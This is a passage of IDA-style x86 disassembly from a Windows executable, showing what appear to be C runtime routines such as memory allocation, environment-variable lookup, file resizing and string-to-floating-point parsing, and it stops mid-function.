push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_515B30 ; MessageBoxA
loc_41EEDE: ; CODE XREF: sub_41EE5D+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EEE2: ; CODE XREF: sub_41EE5D+1C�j
; sub_41EE5D+33�j
xor eax, eax
jmp short loc_41EEDE
sub_41EE5D endp
; =============== S U B R O U T I N E =======================================
sub_41EEE6 proc near ; CODE XREF: sub_41D5D2+22�p
; sub_41D5D2+3B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
imul esi, [esp+0Ch+arg_4]
cmp esi, 0FFFFFFE0h
mov ebx, esi
ja short loc_41EF06
test esi, esi
jnz short loc_41EF00
push 1
pop esi
loc_41EF00: ; CODE XREF: sub_41EEE6+15�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41EF06: ; CODE XREF: sub_41EEE6+11�j
; sub_41EEE6+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_41EF37
cmp ebx, dword_43B7BC
ja short loc_41EF22
push ebx
call sub_419FAD
mov edi, eax
pop ecx
test edi, edi
jnz short loc_41EF4D
loc_41EF22: ; CODE XREF: sub_41EEE6+2D�j
push esi
push 8
push dword_516EC0
nop
call near ptr 7C9105D4h
mov edi, eax
test edi, edi
jnz short loc_41EF59
loc_41EF37: ; CODE XREF: sub_41EEE6+25�j
cmp dword_5158DC, 0
jz short loc_41EF59
push esi
call sub_419BC2
test eax, eax
pop ecx
jz short loc_41EF5F
jmp short loc_41EF06
; ---------------------------------------------------------------------------
loc_41EF4D: ; CODE XREF: sub_41EEE6+3A�j
push ebx
push 0
push edi
call sub_417430
add esp, 0Ch
loc_41EF59: ; CODE XREF: sub_41EEE6+4F�j
; sub_41EEE6+58�j
mov eax, edi
loc_41EF5B: ; CODE XREF: sub_41EEE6+7B�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41EF5F: ; CODE XREF: sub_41EEE6+63�j
xor eax, eax
jmp short loc_41EF5B
sub_41EEE6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D677
loc_41EF63: ; CODE XREF: sub_41D677+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp dword_516B60, esi
jle short loc_41EFB6
loc_41EF72: ; CODE XREF: sub_41D677+193D�j
mov eax, dword_515B4C
mov eax, [eax+esi*4]
test eax, eax
jz short loc_41EFAD
test byte ptr [eax+0Ch], 83h
jz short loc_41EF91
push eax
call sub_4180DC
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41EF91
inc edi
loc_41EF91: ; CODE XREF: sub_41D677+190B�j
; sub_41D677+1917�j
cmp esi, 14h
jl short loc_41EFAD
mov eax, dword_515B4C
push dword ptr [eax+esi*4]
call sub_417C62
mov eax, dword_515B4C
pop ecx
and dword ptr [eax+esi*4], 0
loc_41EFAD: ; CODE XREF: sub_41D677+1905�j
; sub_41D677+191D�j
inc esi
cmp esi, dword_516B60
jl short loc_41EF72
loc_41EFB6: ; CODE XREF: sub_41D677+18F9�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_41D677
; =============== S U B R O U T I N E =======================================
sub_41EFBB proc near ; CODE XREF: sub_41DD12+23�p
arg_0 = dword ptr 4
cmp dword_516EC8, 0
push ebx
push esi
mov esi, dword_5158AC
push edi
jz short loc_41F032
test esi, esi
jnz short loc_41EFEC
cmp dword_5158B4, esi
jz short loc_41F032
call sub_41FAC2
test eax, eax
jnz short loc_41F032
mov esi, dword_5158AC
test esi, esi
jz short loc_41F032
loc_41EFEC: ; CODE XREF: sub_41EFBB+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_41F032
push ebx
call sub_417AF0
pop ecx
mov edi, eax
loc_41EFFD: ; CODE XREF: sub_41EFBB+6D�j
mov eax, [esi]
test eax, eax
jz short loc_41F032
push eax
call sub_417AF0
cmp eax, edi
pop ecx
jbe short loc_41F025
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_41F025
push edi
push ebx
push eax
call sub_41FA83
add esp, 0Ch
test eax, eax
jz short loc_41F02A
loc_41F025: ; CODE XREF: sub_41EFBB+51�j
; sub_41EFBB+59�j
add esi, 4
jmp short loc_41EFFD
; ---------------------------------------------------------------------------
loc_41F02A: ; CODE XREF: sub_41EFBB+68�j
mov eax, [esi]
lea eax, [eax+edi+1]
jmp short loc_41F034
; ---------------------------------------------------------------------------
loc_41F032: ; CODE XREF: sub_41EFBB+10�j
; sub_41EFBB+1C�j ...
xor eax, eax
loc_41F034: ; CODE XREF: sub_41EFBB+75�j
pop edi
pop esi
pop ebx
retn
sub_41EFBB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F038 proc near ; CODE XREF: sub_41E476+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_417B70
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, dword_516C80
jnb loc_41F16D
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_516B80[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_41F16D
push 1
push esi
push ebx
call sub_41BA39
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_41F177
push 2
push esi
push ebx
call sub_41BA39
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_41F177
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41F11A
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_417430
push 8000h
push ebx
call sub_41FB30
add esp, 14h
mov [ebp+arg_4], eax
loc_41F0CE: ; CODE XREF: sub_41F038+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_41F0D9
mov eax, edi
loc_41F0D9: ; CODE XREF: sub_41F038+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41BE4F
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41F0F7
sub edi, eax
test edi, edi
jle short loc_41F10D
jmp short loc_41F0CE
; ---------------------------------------------------------------------------
loc_41F0F7: ; CODE XREF: sub_41F038+B5�j
cmp dword_515888, 5
jnz short loc_41F10A
mov dword_515884, 0Dh
loc_41F10A: ; CODE XREF: sub_41F038+C6�j
or esi, 0FFFFFFFFh
loc_41F10D: ; CODE XREF: sub_41F038+BB�j
push [ebp+arg_4]
push ebx
call sub_41FB30
pop ecx
pop ecx
jmp short loc_41F15A
; ---------------------------------------------------------------------------
loc_41F11A: ; CODE XREF: sub_41F038+71�j
jge short loc_41F15A
push 0
push [ebp+arg_4]
push ebx
call sub_41BA39
push ebx
call sub_41E3E2
add esp, 10h
push eax
nop
call near ptr 7C832044h
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_41F15A
mov dword_515884, 0Dh
nop
call near ptr 7C910331h
mov dword_515888, eax
loc_41F15A: ; CODE XREF: sub_41F038+E0�j
; sub_41F038:loc_41F11A�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41BA39
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41F17A
; ---------------------------------------------------------------------------
loc_41F16D: ; CODE XREF: sub_41F038+1A�j
; sub_41F038+36�j
mov dword_515884, 9
loc_41F177: ; CODE XREF: sub_41F038+4E�j
; sub_41F038+63�j
or eax, 0FFFFFFFFh
loc_41F17A: ; CODE XREF: sub_41F038+133�j
pop esi
pop ebx
leave
retn
sub_41F038 endp
; =============== S U B R O U T I N E =======================================
sub_41F17E proc near ; CODE XREF: sub_41E8DE+2B�p
; sub_41E8DE+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_41F194
cmp ecx, esi
jnb short loc_41F197
loc_41F194: ; CODE XREF: sub_41F17E+10�j
push 1
pop eax
loc_41F197: ; CODE XREF: sub_41F17E+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_41F17E endp
; =============== S U B R O U T I N E =======================================
sub_41F19F proc near ; CODE XREF: sub_41F258+40�p
; sub_41F258+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41F17E
add esp, 0Ch
test eax, eax
jz short loc_41F1D1
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41F17E
add esp, 0Ch
test eax, eax
jz short loc_41F1D1
inc dword ptr [esi+8]
loc_41F1D1: ; CODE XREF: sub_41F19F+19�j
; sub_41F19F+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41F17E
add esp, 0Ch
test eax, eax
jz short loc_41F1E9
inc dword ptr [esi+8]
loc_41F1E9: ; CODE XREF: sub_41F19F+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41F17E
add esp, 0Ch
pop edi
pop esi
retn
sub_41F19F endp
; =============== S U B R O U T I N E =======================================
sub_41F1FD proc near ; CODE XREF: sub_41F258+30�p
; sub_41F258+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_41F1FD endp
; =============== S U B R O U T I N E =======================================
sub_41F22B proc near ; CODE XREF: sub_41F7F0+1C8�p
; sub_41FBA6+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41F22B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F258 proc near ; CODE XREF: sub_41F31F+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41F2CC
push edi
mov [ebp+arg_8], eax
loc_41F27F: ; CODE XREF: sub_41F258+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_41F1FD
push ebx
call sub_41F1FD
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F19F
push ebx
call sub_41F1FD
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F19F
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41F27F
xor edx, edx
pop edi
loc_41F2CC: ; CODE XREF: sub_41F258+21�j
; sub_41F258+9F�j
cmp [ebx+8], edx
jnz short loc_41F2F9
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_41F2CC
; ---------------------------------------------------------------------------
loc_41F2F9: ; CODE XREF: sub_41F258+77�j
mov esi, 8000h
loc_41F2FE: ; CODE XREF: sub_41F258+B9�j
test [ebx+8], esi
jnz short loc_41F313
push ebx
call sub_41F1FD
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_41F2FE
; ---------------------------------------------------------------------------
loc_41F313: ; CODE XREF: sub_41F258+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_41F258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F31F proc near ; CODE XREF: sub_41EC27+17�p
; sub_41EC54+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_41F35A: ; CODE XREF: sub_41F31F+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41F370
cmp cl, 9
jz short loc_41F370
cmp cl, 0Ah
jz short loc_41F370
cmp cl, 0Dh
jnz short loc_41F373
loc_41F370: ; CODE XREF: sub_41F31F+40�j
; sub_41F31F+45�j ...
inc edi
jmp short loc_41F35A
; ---------------------------------------------------------------------------
loc_41F373: ; CODE XREF: sub_41F31F+4F�j
push 4
pop esi
loc_41F376: ; CODE XREF: sub_41F31F+AE�j
; sub_41F31F+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41F5F9 ; default
; jumptable 0041F382 case 10
jmp off_41F7C0[eax*4] ; switch jump
loc_41F389: ; DATA XREF: ___:off_41F7C0�o
cmp bl, 31h ; jumptable 0041F382 case 0
jl short loc_41F39A
cmp bl, 39h
jg short loc_41F39A
loc_41F393: ; CODE XREF: sub_41F31F+C4�j
; sub_41F31F+118�j
push 3
jmp loc_41F5B7
; ---------------------------------------------------------------------------
loc_41F39A: ; CODE XREF: sub_41F31F+6D�j
; sub_41F31F+72�j
cmp bl, byte_43B7B0
jnz short loc_41F3A9
loc_41F3A2: ; CODE XREF: sub_41F31F+124�j
push 5
jmp loc_41F5EF
; ---------------------------------------------------------------------------
loc_41F3A9: ; CODE XREF: sub_41F31F+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F3CF
dec eax
dec eax
jz short loc_41F3C3
sub eax, 3
jnz loc_41F692
jmp loc_41F452
; ---------------------------------------------------------------------------
loc_41F3C3: ; CODE XREF: sub_41F31F+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_41F376
; ---------------------------------------------------------------------------
loc_41F3CF: ; CODE XREF: sub_41F31F+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_41F376
; ---------------------------------------------------------------------------
loc_41F3D8: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp bl, 31h ; jumptable 0041F382 case 1
mov [ebp+var_10], edx
jl short loc_41F3E5
cmp bl, 39h
jle short loc_41F393
loc_41F3E5: ; CODE XREF: sub_41F31F+BF�j
cmp bl, byte_43B7B0
jz loc_41F4AD
cmp bl, 2Bh
jz short loc_41F427
cmp bl, 2Dh
jz short loc_41F427
cmp bl, 30h
jz short loc_41F452
loc_41F400: ; CODE XREF: sub_41F31F+207�j
cmp bl, 43h
jle loc_41F692
cmp bl, 45h
jle short loc_41F420
cmp bl, 63h
jle loc_41F692
cmp bl, 65h
jg loc_41F692
loc_41F420: ; CODE XREF: sub_41F31F+ED�j
push 6
jmp loc_41F5EF
; ---------------------------------------------------------------------------
loc_41F427: ; CODE XREF: sub_41F31F+D5�j
; sub_41F31F+DA�j ...
dec edi
push 0Bh
jmp loc_41F5EF
; ---------------------------------------------------------------------------
loc_41F42F: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp bl, 31h ; jumptable 0041F382 case 2
jl short loc_41F43D
cmp bl, 39h
jle loc_41F393
loc_41F43D: ; CODE XREF: sub_41F31F+113�j
cmp bl, byte_43B7B0
jz loc_41F3A2
cmp bl, 30h
jnz loc_41F607
loc_41F452: ; CODE XREF: sub_41F31F+9F�j
; sub_41F31F+DF�j
mov eax, edx
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F459: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
mov [ebp+var_10], edx ; jumptable 0041F382 case 3
loc_41F45C: ; CODE XREF: sub_41F31F+184�j
cmp dword_43B7AC, edx
jle short loc_41F475
movzx eax, bl
push esi
push eax
call sub_419B4D
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F483
; ---------------------------------------------------------------------------
loc_41F475: ; CODE XREF: sub_41F31F+143�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F483: ; CODE XREF: sub_41F31F+154�j
test eax, eax
jz short loc_41F4A5
cmp [ebp+var_4], 19h
jnb short loc_41F49D
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_41F4A0
; ---------------------------------------------------------------------------
loc_41F49D: ; CODE XREF: sub_41F31F+16C�j
inc [ebp+var_8]
loc_41F4A0: ; CODE XREF: sub_41F31F+17C�j
mov bl, [edi]
inc edi
jmp short loc_41F45C
; ---------------------------------------------------------------------------
loc_41F4A5: ; CODE XREF: sub_41F31F+166�j
cmp bl, byte_43B7B0
jnz short loc_41F514
loc_41F4AD: ; CODE XREF: sub_41F31F+CC�j
mov eax, esi
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F4B4: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp [ebp+var_4], 0 ; jumptable 0041F382 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_41F4CD
loc_41F4C0: ; CODE XREF: sub_41F31F+1AC�j
cmp bl, 30h
jnz short loc_41F4CD
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_41F4C0
; ---------------------------------------------------------------------------
loc_41F4CD: ; CODE XREF: sub_41F31F+19F�j
; sub_41F31F+1A4�j ...
cmp dword_43B7AC, edx
jle short loc_41F4E6
movzx eax, bl
push esi
push eax
call sub_419B4D
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F4F4
; ---------------------------------------------------------------------------
loc_41F4E6: ; CODE XREF: sub_41F31F+1B4�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F4F4: ; CODE XREF: sub_41F31F+1C5�j
test eax, eax
jz short loc_41F514
cmp [ebp+var_4], 19h
jnb short loc_41F50F
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_41F50F: ; CODE XREF: sub_41F31F+1DD�j
mov bl, [edi]
inc edi
jmp short loc_41F4CD
; ---------------------------------------------------------------------------
loc_41F514: ; CODE XREF: sub_41F31F+18C�j
; sub_41F31F+1D7�j
cmp bl, 2Bh
jz loc_41F427
cmp bl, 2Dh
jz loc_41F427
jmp loc_41F400
; ---------------------------------------------------------------------------
loc_41F52B: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp dword_43B7AC, edx ; jumptable 0041F382 case 5
mov [ebp+var_24], edx
jle short loc_41F547
movzx eax, bl
push esi
push eax
call sub_419B4D
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41F555
; ---------------------------------------------------------------------------
loc_41F547: ; CODE XREF: sub_41F31F+215�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41F555: ; CODE XREF: sub_41F31F+226�j
test eax, eax
jz loc_41F607
mov eax, esi
jmp short loc_41F5B8
; ---------------------------------------------------------------------------
loc_41F561: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
lea ecx, [edi-2] ; jumptable 0041F382 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_41F571
cmp bl, 39h
jle short loc_41F5B5
loc_41F571: ; CODE XREF: sub_41F31F+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41F5ED
dec eax
dec eax
jz short loc_41F5E1
sub eax, 3
jnz loc_41F695
loc_41F586: ; CODE XREF: sub_41F31F+2A4�j
push 8
jmp short loc_41F5EF
; ---------------------------------------------------------------------------
loc_41F58A: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
mov [ebp+var_20], edx ; jumptable 0041F382 case 8
loc_41F58D: ; CODE XREF: sub_41F31F+276�j
cmp bl, 30h
jnz short loc_41F597
mov bl, [edi]
inc edi
jmp short loc_41F58D
; ---------------------------------------------------------------------------
loc_41F597: ; CODE XREF: sub_41F31F+271�j
cmp bl, 31h
jl loc_41F692
cmp bl, 39h
jg loc_41F692
jmp short loc_41F5B5
; ---------------------------------------------------------------------------
loc_41F5AB: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp bl, 31h ; jumptable 0041F382 case 7
jl short loc_41F5BE
cmp bl, 39h
jg short loc_41F5BE
loc_41F5B5: ; CODE XREF: sub_41F31F+250�j
; sub_41F31F+28A�j
push 9
loc_41F5B7: ; CODE XREF: sub_41F31F+76�j
pop eax
loc_41F5B8: ; CODE XREF: sub_41F31F+240�j
dec edi
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F5BE: ; CODE XREF: sub_41F31F+28F�j
; sub_41F31F+294�j
cmp bl, 30h
jnz short loc_41F607
jmp short loc_41F586
; ---------------------------------------------------------------------------
loc_41F5C5: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
cmp [ebp+arg_18], 0 ; jumptable 0041F382 case 11
jz short loc_41F5F5
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_41F5ED
dec eax
dec eax
jnz loc_41F695
loc_41F5E1: ; CODE XREF: sub_41F31F+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F5ED: ; CODE XREF: sub_41F31F+258�j
; sub_41F31F+2B8�j
push 7
loc_41F5EF: ; CODE XREF: sub_41F31F+85�j
; sub_41F31F+103�j ...
pop eax
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F5F5: ; CODE XREF: sub_41F31F+2AA�j
push 0Ah
dec edi
pop eax
loc_41F5F9: ; CODE XREF: sub_41F31F+5D�j
; sub_41F31F+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041F382 case 10
jz loc_41F697
jmp loc_41F376
; ---------------------------------------------------------------------------
loc_41F607: ; CODE XREF: sub_41F31F+12D�j
; sub_41F31F+238�j ...
mov edi, [ebp+arg_8]
jmp loc_41F697
; ---------------------------------------------------------------------------
loc_41F60F: ; CODE XREF: sub_41F31F+63�j
; DATA XREF: ___:off_41F7C0�o
mov [ebp+var_20], 1 ; jumptable 0041F382 case 9
xor esi, esi
loc_41F618: ; CODE XREF: sub_41F31F+339�j
cmp dword_43B7AC, 1
jle short loc_41F630
movzx eax, bl
push 4
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41F63F
; ---------------------------------------------------------------------------
loc_41F630: ; CODE XREF: sub_41F31F+300�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F63F: ; CODE XREF: sub_41F31F+30F�j
test eax, eax
jz short loc_41F65F
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41F65A
mov bl, [edi]
inc edi
jmp short loc_41F618
; ---------------------------------------------------------------------------
loc_41F65A: ; CODE XREF: sub_41F31F+334�j
mov esi, 1451h
loc_41F65F: ; CODE XREF: sub_41F31F+322�j
mov [ebp+var_1C], esi
loc_41F662: ; CODE XREF: sub_41F31F+371�j
cmp dword_43B7AC, 1
jle short loc_41F67A
movzx eax, bl
push 4
push eax
call sub_419B4D
pop ecx
pop ecx
jmp short loc_41F689
; ---------------------------------------------------------------------------
loc_41F67A: ; CODE XREF: sub_41F31F+34A�j
mov ecx, off_43B5A0
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41F689: ; CODE XREF: sub_41F31F+359�j
test eax, eax
jz short loc_41F692
mov bl, [edi]
inc edi
jmp short loc_41F662
; ---------------------------------------------------------------------------
loc_41F692: ; CODE XREF: sub_41F31F+99�j
; sub_41F31F+E4�j ...
dec edi
jmp short loc_41F697
; ---------------------------------------------------------------------------
loc_41F695: ; CODE XREF: sub_41F31F+261�j
; sub_41F31F+2BC�j
mov edi, ecx
loc_41F697: ; CODE XREF: sub_41F31F+2DD�j
; sub_41F31F+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_41F77F
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_41F6C3
cmp [ebp+var_45], 5
jl short loc_41F6B7
inc [ebp+var_45]
loc_41F6B7: ; CODE XREF: sub_41F31F+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_41F6C6
; ---------------------------------------------------------------------------
loc_41F6C3: ; CODE XREF: sub_41F31F+38D�j
mov eax, [ebp+var_C]
loc_41F6C6: ; CODE XREF: sub_41F31F+3A2�j
cmp [ebp+var_4], 0
jbe loc_41F775
loc_41F6D0: ; CODE XREF: sub_41F31F+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_41F6DE
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_41F6D0
; ---------------------------------------------------------------------------
loc_41F6DE: ; CODE XREF: sub_41F31F+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_41F258
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_41F6FD
neg eax
loc_41F6FD: ; CODE XREF: sub_41F31F+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_41F708
add eax, [ebp+arg_10]
loc_41F708: ; CODE XREF: sub_41F31F+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_41F710
sub eax, [ebp+arg_14]
loc_41F710: ; CODE XREF: sub_41F31F+3EC�j
cmp eax, 1450h
jle short loc_41F747
mov [ebp+var_2C], 1
loc_41F71E: ; CODE XREF: sub_41F31F+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_41F72A: ; CODE XREF: sub_41F31F+454�j
; sub_41F31F+45E�j
cmp [ebp+var_2C], 0
jz short loc_41F790
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_41F7A5
; ---------------------------------------------------------------------------
loc_41F747: ; CODE XREF: sub_41F31F+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_41F757
mov [ebp+var_30], 1
jmp short loc_41F71E
; ---------------------------------------------------------------------------
loc_41F757: ; CODE XREF: sub_41F31F+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_41FDC6
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_41F72A
; ---------------------------------------------------------------------------
loc_41F775: ; CODE XREF: sub_41F31F+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_41F72A
; ---------------------------------------------------------------------------
loc_41F77F: ; CODE XREF: sub_41F31F+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_41F7A5
; ---------------------------------------------------------------------------
loc_41F790: ; CODE XREF: sub_41F31F+40F�j
cmp [ebp+var_30], 0
jz short loc_41F7A5
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_41F7A5: ; CODE XREF: sub_41F31F+426�j
; sub_41F31F+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
